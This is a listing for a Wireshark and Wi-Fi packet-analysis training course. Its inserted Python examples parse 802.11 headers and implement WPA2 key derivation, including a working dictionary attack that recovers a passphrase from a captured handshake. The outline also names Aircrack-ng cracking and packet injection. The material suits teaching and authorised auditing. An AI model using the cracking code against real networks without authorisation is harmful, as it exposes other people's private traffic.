Duration:

5 Days

Audience:

Employees of federal, state and local governments; and businesses working with the government.

Course Overview:

In this hands-on course, you will receive in-depth training on Wireshark® and Wi-Fi communications analysis. You will develop the skills to capture, decrypt and analyze wireless packets, and leave with a set of analysis techniques built on vendor-neutral, open-source tools.

Who Needs to Attend

Wireless network engineers and Ethernet network engineers with basic- to intermediate-level general networking knowledge who want to add wireless capabilities to an existing network

Prerequisites

  • Familiarity with TCP/IP networking, Wi-Fi fundamentals, and network infrastructure devices such as switches, routers, etc.

Course Outline

Wireshark

  • Perform unattended captures with auto-stop conditions
  • Apply a decryption key (WPA/WPA2 passphrase or PMK) to reveal upper-layer protocols for analysis
    • Verify that the key actually decrypted the traffic
    • Troubleshooting steps if decryption fails (e.g., the four-way handshake is missing from the capture)
  • Capture and display filter syntax
  • Statistics and graphs
  • Filter on addresses, protocols, fields or traffic characteristics
  • Filter on keywords using wildcards and regular expressions
  • Reassemble and extract files from captured traffic
  • Dissect and fix malformed packets

Command Line Tools

  • Aircrack-ng Suite
    • Switch the capture adapter into monitor mode with Airmon-ng
    • Capture with Airodump-ng
    • Crack WPA/WPA2 passphrase keys with Aircrack-ng
    • Inject packets with Aireplay-ng
  • Capinfos
  • Dumpcap
  • Editcap
  • Mergecap
    • How to merge captures of compatible file types: cap, pcap, pcapng, and Kismet captures
  • Reordercap
    • Reordering out-of-order EAPOL handshake frames
  • Tcpdump
    • Filter on large pcaps
  • Tshark
    • Streamline analysis, especially of large pcaps
    • Traffic analysis to map access points of interest and their associated clients from a large pcap
    • Extracting packets for a specific MAC, BSSID, SSID, etc. into a smaller file for analysis
  • Nmap

802.11 Capture and Analysis

  • 802.11 Operation Modes
    • Device-to-Device (Ad hoc / IBSS) Communication
    • Basic Service Set (BSS)
    • Basic Service Set Identifier (BSSID)
    • Extended Service Set (ESS) and its identifier (ESSID)
  • 802.11 MAC Layer Frame Types
    • Management
    • Control
    • Data
  • 802.11 MAC Layer Frame Formats
    • Frame Control
    • To/From DS
    • Addresses
    • Filter random MAC addresses
  • 802.11 Address Types
    • Transmitter vs. Source Address
    • Receiver vs Destination Address
  • 802.11 Operation and Frame Exchanges
    • Beacons
    • Probe Request/Response
    • Authentication/ACK
    • Association Request/Response
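As an added worked example (not part of the course material), the following Python decodes the header fields listed above: the Frame Control field, the To/From DS bits, the four address slots and the roles (RA/TA/DA/SA/BSSID) they take on, plus the locally-administered-bit check behind "filter random MAC addresses" and the SSID element that ties a beacon's BSSID to its SSID. The three frames at the bottom are constructed by hand for the demonstration; the parser assumes the radiotap header has already been stripped and the FCS is absent.

```python
"""Decode an 802.11 MAC header: Frame Control, To/From DS, address roles,
randomized-MAC check and the SSID element of a Beacon/Probe Response.
Added example; the sample frames below are constructed, not captured."""
import struct

TYPE_NAMES = {0: "Management", 1: "Control", 2: "Data", 3: "Extension"}
SUBTYPE_NAMES = {
    (0, 0): "Association Request", (0, 1): "Association Response",
    (0, 4): "Probe Request", (0, 5): "Probe Response", (0, 8): "Beacon",
    (0, 10): "Disassociation", (0, 11): "Authentication", (0, 12): "Deauthentication",
    (1, 8): "Block Ack Request", (1, 9): "Block Ack", (1, 10): "PS-Poll",
    (1, 11): "RTS", (1, 12): "CTS", (1, 13): "ACK",
    (2, 0): "Data", (2, 4): "Null", (2, 8): "QoS Data",
}
CTRL_WITH_ADDR2 = {8, 9, 10, 11}  # control subtypes that carry a TA/BSSID after RA


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def is_randomized(raw):
    """Locally administered (bit 1 of octet 0) and unicast: the pattern randomized
    client MACs use. Wireshark equivalent: wlan.addr.lg == 1 && wlan.addr.ig == 0"""
    return bool(raw[0] & 0x02) and not raw[0] & 0x01


def address_roles(to_ds, from_ds):
    """Meaning of Addr1..Addr3 (and Addr4) for data frames, chosen by the DS bits."""
    if to_ds and from_ds:
        return ("RA", "TA", "DA", "SA")      # 4-address frame (WDS / mesh)
    if to_ds:
        return ("RA=BSSID", "TA=SA", "DA")   # STA -> AP
    if from_ds:
        return ("RA=DA", "TA=BSSID", "SA")   # AP -> STA
    return ("RA=DA", "TA=SA", "BSSID")       # IBSS, and all management frames


def ssid_from_mgmt_body(body):
    """Walk the information elements after the 12 fixed bytes (timestamp,
    interval, capability) of a Beacon/Probe Response; element ID 0 is the SSID."""
    pos = 12
    while pos + 2 <= len(body):
        eid, elen = body[pos], body[pos + 1]
        if eid == 0:
            return body[pos + 2:pos + 2 + elen].decode("utf-8", "replace")
        pos += 2 + elen
    return None


def parse_80211(frame):
    """Decode the MAC header of one frame (radiotap stripped, no trailing FCS)."""
    fc, _duration = struct.unpack_from("<HH", frame, 0)   # Frame Control is little-endian
    ftype, subtype, flags = (fc >> 2) & 0x3, (fc >> 4) & 0xF, fc >> 8
    to_ds, from_ds = bool(flags & 0x01), bool(flags & 0x02)
    info = {
        "type_name": TYPE_NAMES[ftype],
        "subtype_name": SUBTYPE_NAMES.get((ftype, subtype), f"subtype {subtype}"),
        "to_ds": to_ds, "from_ds": from_ds,
        "retry": bool(flags & 0x08), "protected": bool(flags & 0x40),
        "addresses": [],
    }
    if ftype == 1:   # control frames: RA, optionally a second address, no Addr3/Sequence Control
        roles = ("RA", "TA") if subtype in CTRL_WITH_ADDR2 else ("RA",)
    else:
        roles = address_roles(to_ds, from_ds)
    offset = 4
    for i, role in enumerate(roles):
        if i == 3:
            offset = 24          # Addr4 sits after the 2-byte Sequence Control field
        raw = frame[offset:offset + 6]
        info["addresses"].append({"slot": f"Addr{i + 1}", "role": role,
                                  "mac": mac_str(raw), "randomized": is_randomized(raw)})
        offset += 6
    if ftype == 0 and subtype in (5, 8):
        info["ssid"] = ssid_from_mgmt_body(frame[24:])
    return info


# Constructed sample frames (hypothetical addresses).
AP = bytes.fromhex("001122334455")
STA = bytes.fromhex("0a1b2c3d4e5f")      # 0x0a has the locally administered bit set
GW = bytes.fromhex("00aabbccddee")
BCAST = b"\xff" * 6
# Beacon: FC 0x0080 (Management/Beacon), fixed fields, then SSID and Supported Rates IEs.
BEACON = (bytes.fromhex("8000") + b"\x00\x00" + BCAST + AP + AP + b"\x10\x00"
          + b"\x00" * 8 + b"\x64\x00" + b"\x11\x04"
          + bytes([0, 8]) + b"CorpWiFi" + bytes([1, 4]) + bytes([0x82, 0x84, 0x8B, 0x96]))
# Protected data frame from the randomized client to the AP: FC 0x4108 (Data, To DS, Protected).
DATA_TO_AP = bytes.fromhex("0841") + b"\x00\x00" + AP + STA + GW + b"\x20\x00" + b"\x00" * 24
# ACK control frame to the client: FC 0x00d4 (Control/ACK), RA only.
ACK = bytes.fromhex("d400") + b"\x00\x00" + STA

if __name__ == "__main__":
    for name, frame in (("beacon", BEACON), ("data", DATA_TO_AP), ("ack", ACK)):
        d = parse_80211(frame)
        addrs = ", ".join(f"{a['slot']} {a['role']}={a['mac']}{' (randomized)' if a['randomized'] else ''}"
                          for a in d["addresses"])
        print(f"{name}: {d['type_name']}/{d['subtype_name']} ToDS={d['to_ds']} FromDS={d['from_ds']} "
              f"Protected={d['protected']} SSID={d.get('ssid')} | {addrs}")
```

The point the address-role table makes is the one that trips people up in Wireshark: `wlan.sa`/`wlan.da` are derived fields that change slot depending on To/From DS, while `wlan.ta`/`wlan.ra` always mean the radios that actually transmitted and received the frame.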

802.11 Security

  • WLAN Discovery Techniques
    • Use Wireshark WLAN Statistics to correlate MACs to BSSIDs, and BSSIDs to SSIDs
    • How certain activity looks on the air
      • Repeated deauthentication frames
      • Nmap scans
  • 802.11 Authentication and Key Exchange
    • 802.1X/EAP exchanges (enterprise) vs. Pre-Shared Key authentication (personal)
    • Four-way handshake
    • Group key handshake
  • Compare encrypted vs decrypted traffic – What can be gained from each
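The four-way handshake, the passphrase-cracking step in the Aircrack-ng unit, and "verify the key decrypted the traffic" all come down to the same computation, shown here as an added example (not course material and not aircrack-ng's code): PBKDF2 turns passphrase and SSID into the PMK, PRF-384 turns PMK, both MACs and both nonces into the PTK, and the first 16 bytes of the PTK (the KCK) must reproduce the MIC on EAPOL message 2. If they do, the passphrase is right and Wireshark can decrypt; if they do not, a candidate passphrase is rejected. The SSID, MACs, nonces and EAPOL frame below are constructed for the demo; in practice they are read from the capture (Wireshark fields `eapol.keydes.nonce`, `eapol.keydes.mic`, `wlan.sa`, `wlan.da`).

```python
"""WPA2-Personal key hierarchy and EAPOL MIC check, as used to validate a
passphrase against a captured four-way handshake. Added example; the
handshake values are constructed, not taken from a real capture."""
import hashlib
import hmac
import struct


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes) (IEEE 802.11 Annex J)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    """IEEE 802.11 PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ... concatenated."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk, aa, spa, anonce, snonce):
    """PTK = PRF-384(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces)).
    With CCMP: KCK = PTK[0:16] (MIC key), KEK = PTK[16:32], TK = PTK[32:48] (data key)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


# EAPOL-Key MIC offset: EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + nonce (32) + key IV (16) + RSC (8) + key ID (8) = 81
MIC_OFFSET = 81


def eapol_mic(kck, eapol_frame):
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the frame with the MIC field
    zeroed, truncated to 16 bytes. (Version 1 / TKIP uses HMAC-MD5 instead.)"""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def passphrase_matches(candidate, hs):
    """True if the candidate passphrase reproduces the MIC on the captured EAPOL message 2."""
    pmk = pmk_from_passphrase(candidate, hs["ssid"])
    kck = derive_ptk(pmk, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])[:16]
    captured_mic = hs["eapol_msg2"][MIC_OFFSET:MIC_OFFSET + 16]
    return hmac.compare_digest(eapol_mic(kck, hs["eapol_msg2"]), captured_mic)


def crack(wordlist, hs):
    """Dictionary attack: return the first passphrase that validates, or None."""
    for candidate in wordlist:
        if passphrase_matches(candidate, hs):
            return candidate
    return None


def build_constructed_handshake(true_passphrase):
    """Fabricate a self-consistent handshake for the demo: hypothetical AP and client
    MACs, fixed nonces, and an EAPOL message 2 whose MIC is computed with the true key.
    In real analysis every one of these values comes from the pcap instead."""
    ssid = "CorpWiFi"
    aa = bytes.fromhex("001122334455")      # authenticator (AP) address
    spa = bytes.fromhex("0a1b2c3d4e5f")     # supplicant (client) address
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # key data of message 2
    body = (b"\x02"                          # descriptor type: RSN
            + struct.pack(">H", 0x010A)      # key info: MIC set, Pairwise, descriptor version 2
            + struct.pack(">H", 0)           # key length
            + struct.pack(">Q", 1)           # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, ID
            + b"\x00" * 16                   # MIC placeholder, filled in below
            + struct.pack(">H", len(rsn_ie)) + rsn_ie)
    frame = b"\x02\x03" + struct.pack(">H", len(body)) + body    # EAPOL v2, type Key
    kck = derive_ptk(pmk_from_passphrase(true_passphrase, ssid), aa, spa, anonce, snonce)[:16]
    frame = frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce, "eapol_msg2": frame}


if __name__ == "__main__":
    hs = build_constructed_handshake("correct horse battery")
    print("PMK(password, IEEE) =", pmk_from_passphrase("password", "IEEE").hex())
    print("recovered passphrase:", crack(["letmein", "Password1", "correct horse battery"], hs))
```

Two practical consequences follow directly from the code: the PMK depends on the SSID, so a capture taken against the wrong SSID (or a hidden SSID you have not recovered from a probe response) will never validate, and decryption needs the nonces from the handshake itself, which is why a capture that lacks messages 1 and 2 stays opaque no matter how correct the passphrase is.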

Decrypted Protocol Analysis

  • Understanding the value of:
    • User agent strings
    • Port numbers
    • Public vs private addresses
  • Understanding what can be gained from:
    • ARP requests and replies
    • DHCP
    • TCP
    • HTTP
    • TLS

The course concludes with a Capture the Flag (CTF) exercise on extracting files, pictures, videos, etc. from captured traffic.

Hardware used in class:

Alfa WLAN adapters are provided so that the tools behave consistently on known hardware (monitor mode and packet injection depend on the adapter chipset and driver). We regularly evaluate the WLAN adapter models on the market and supply the most versatile and best-supported hardware.